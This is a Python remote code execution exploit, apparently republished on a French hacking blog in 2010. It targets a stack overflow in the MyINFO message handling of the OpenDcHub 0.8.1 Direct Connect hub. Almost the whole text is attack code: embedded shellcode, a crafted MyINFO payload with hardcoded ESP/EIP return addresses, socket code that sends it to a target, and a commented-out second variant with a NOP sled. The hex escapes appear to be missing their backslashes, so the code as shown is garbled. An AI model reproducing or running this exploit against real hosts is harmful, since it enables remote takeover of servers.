#!/usr/bin/python # # OpenDcHub 0.8.1 Remote Code Execution Exploit # Pierre Nogues - http://www.indahax.com # # Description: # OpenDcHub is a direct connect hub for Linux # # OpenDcHub doesn't handle specially crafted MyINFO message which lead to a stack overflow. # # Affected versions : # OpenDcHub 0.8.1 # # Plateforms : # Unix # # Usage : # ./exploit.py import socket host = '192.168.1.9' port = 5000 # must not contain x36 x53 x00 bytes # max shellcode size = 103 bytes use exploit v2 otherwise shellcode="x33xc9xb1x13xbaxf6x1dxe7xfaxdbxdexd9x74x24" shellcode+="xf4x5ex83xc6x04x31x56x0ax03xa0x17x05x0fx7d" shellcode+="xf3x3ex13x2ex40x92xbexd2xcfxf5x8fxb4x02x75" shellcode+="xb4x66xf5xb6xe3x97x37x51x9cx86x6bxfbx0fxc2" shellcode+="x83x52xe0x9bx45x17x6axfdxddx55xeax58x59xbc" shellcode+="x5bx65xa8xbfxd5xe0xcbx90x8dx3dx03x62x26x29" shellcode+="x74xe6xdfxc7x03x05x4fx44x9dx2bxc0x61x50x2b" shellcode+="x2b" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send("$ValidateNick joseph|") hax="$MyINFO $ALL joseph " hax+=shellcode for i in range(103 - len(shellcode)): hax+="A" hax+="$" hax+="x20x81x81x80" # esp hax+="xedxf6xfexbf" # eip hax+="S:-1|" s.send(hax) s.close() """ # V2 # more complex version working too, it have more space for the shellcode hax="$MyINFO $ALL joseph AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" hax+="xFFxFFxFFxFE" # local var int len of commands.c:my_info() must be a negative value hax+="TTTTUUUUVVVVWWWWXXXXYYYYZZZZBBBBCCCCEEEEEEE$" hax+="x20x81x81x80" # esp hax+="x80xf7xfexbf" # eip hax+="xCCxCCxCCxCC" # useless var hax+="x10xf0xfexbf" # this address + x20 will be overwritten by 4 bytes # shellcode time hax+="x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" hax+="x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" hax+=shellcode hax+="|" """
OpenDCHub 0.8.1 Remote Code Execution Exploit
Le 31/03/2010
dans Hacking